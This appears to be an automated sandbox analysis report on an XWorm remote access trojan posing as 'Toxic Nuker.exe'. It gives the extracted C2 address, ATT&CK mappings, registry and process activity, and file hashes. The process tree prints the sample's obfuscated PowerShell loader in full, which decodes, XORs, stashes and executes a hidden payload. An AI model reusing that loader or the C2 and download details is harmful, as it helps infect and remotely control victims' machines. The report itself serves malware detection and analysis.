xworm | hxxps://mega[.]nz/file/sIISlSIL#8PRC3AZsk50SutS2mPxmfzUgMygn2ygU9VKyHvpT494

Analysis

max time kernel
199s
max time network
201s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04/03/2025, 15:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/sIISlSIL#8PRC3AZsk50SutS2mPxmfzUgMygn2ygU9VKyHvpT494

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

meowycatty.ddns.net:8843

Mutex

jRccj8SKwN7fQIlB

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/564-310-0x000001BCF9070000-0x000001BCF907E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
78	564	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
564	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4708	Toxic Nuker.exe
3924	main.exe

Loads dropped DLL 15 IoCs

pid	Process
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe
3924	main.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
153	raw.githubusercontent.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133855773307584233"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1036	chrome.exe
1036	chrome.exe
564	powershell.exe
564	powershell.exe
564	powershell.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
440	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: 33	1456	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1456	AUDIODG.EXE
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe
Token: SeShutdownPrivilege	1036	chrome.exe
Token: SeCreatePagefilePrivilege	1036	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
1036	chrome.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1036 wrote to memory of 5060	1036	chrome.exe	81
PID 1036 wrote to memory of 5060	1036	chrome.exe	81
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 2476	1036	chrome.exe	82
PID 1036 wrote to memory of 1840	1036	chrome.exe	83
PID 1036 wrote to memory of 1840	1036	chrome.exe	83
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84
PID 1036 wrote to memory of 2680	1036	chrome.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/sIISlSIL#8PRC3AZsk50SutS2mPxmfzUgMygn2ygU9VKyHvpT494
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff81fdecc40,0x7ff81fdecc4c,0x7ff81fdecc58
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1940 /prefetch:2
  2⤵
  PID:2476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2416 /prefetch:3
  2⤵
  PID:1840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2424 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:3780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:3872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4652,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:8
  2⤵
  PID:1164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=5044,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:1092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4396,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5048 /prefetch:8
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5568,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  PID:3888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5596,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5644 /prefetch:8
  2⤵
  PID:1452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5612,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5908 /prefetch:8
  2⤵
  PID:2880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5620,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6064 /prefetch:8
  2⤵
  PID:3376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5628,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6088 /prefetch:8
  2⤵
  PID:3692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5168,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5196 /prefetch:8
  2⤵
  PID:3372
- C:\Users\Admin\Downloads\Toxic Nuker.exe
  "C:\Users\Admin\Downloads\Toxic Nuker.exe"
  2⤵
  - Executes dropped EXE
  PID:4708
- - C:\Users\Admin\AppData\Local\Temp\onefile_4708_133855773659516085\main.exe
    "C:\Users\Admin\Downloads\Toxic Nuker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\7r7d8086.bat
      4⤵
      PID:3688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:xrDrGAvriu;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path;};$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-loJDe' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c
      4⤵
      PID:1060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6324,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5236 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3148,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:1940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3120,i,1341608548895146492,15335740276793484366,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5616 /prefetch:8
  2⤵
  PID:1952

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1500

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x398 0x3a0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:440

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5656

C:\Windows\System32\71aplw.exe
"C:\Windows\System32\71aplw.exe"
1⤵
PID:5740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
651f15584329305c3538eaa0e3b4fe7d

SHA1
4aef97836eecd48f8e2fbc529f568ae723af3a63

SHA256
75b9c8de11d87087c5fe07e80a548bcd63f8a59fe00b05c5f55414974aacfb25

SHA512
0c3ecd4520844d682f67cfd918d2acd9461fe88bddeb50cf1a1b149def94abd36f7518b0ea962ab2024facc0301bad4c8e958cc1440362bf9f014bff30eaab8e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
641301b4a0388632ee47b880731b5b02

SHA1
c2d008a5d6807ddb36da6b58b07f6ce84d76367d

SHA256
898a97f5868a55ed752e912b4079a6becbf84ddaa6dc3784891fe73d04844ab5

SHA512
931382fe1660ff75896112e4a8809ef59c04672d8e94dc651dab84a428b9b681ebb51e8eb9437dbc413b0a18f847f79e09022e70aedbe48cc252db8088fadc05

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
74e70a1eb25ee59c4ae87d9d3890d334

SHA1
084d8c5733e5cab99b7074dab3633466a9c8d1f5

SHA256
f5e18082226698b64ccd932a5d89e4ead57acc086cc5af43ee24c87e497b832e

SHA512
0dda1a3191f5ff9f61b9ed8851c734fc86366248071705ca06e6b28cd0c9dda51697f76d504c04ca887da383f6d58125a759b3dadef8ad473233d7910703e8f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\p\Paths\MANIFEST-000001

Filesize
41B

MD5
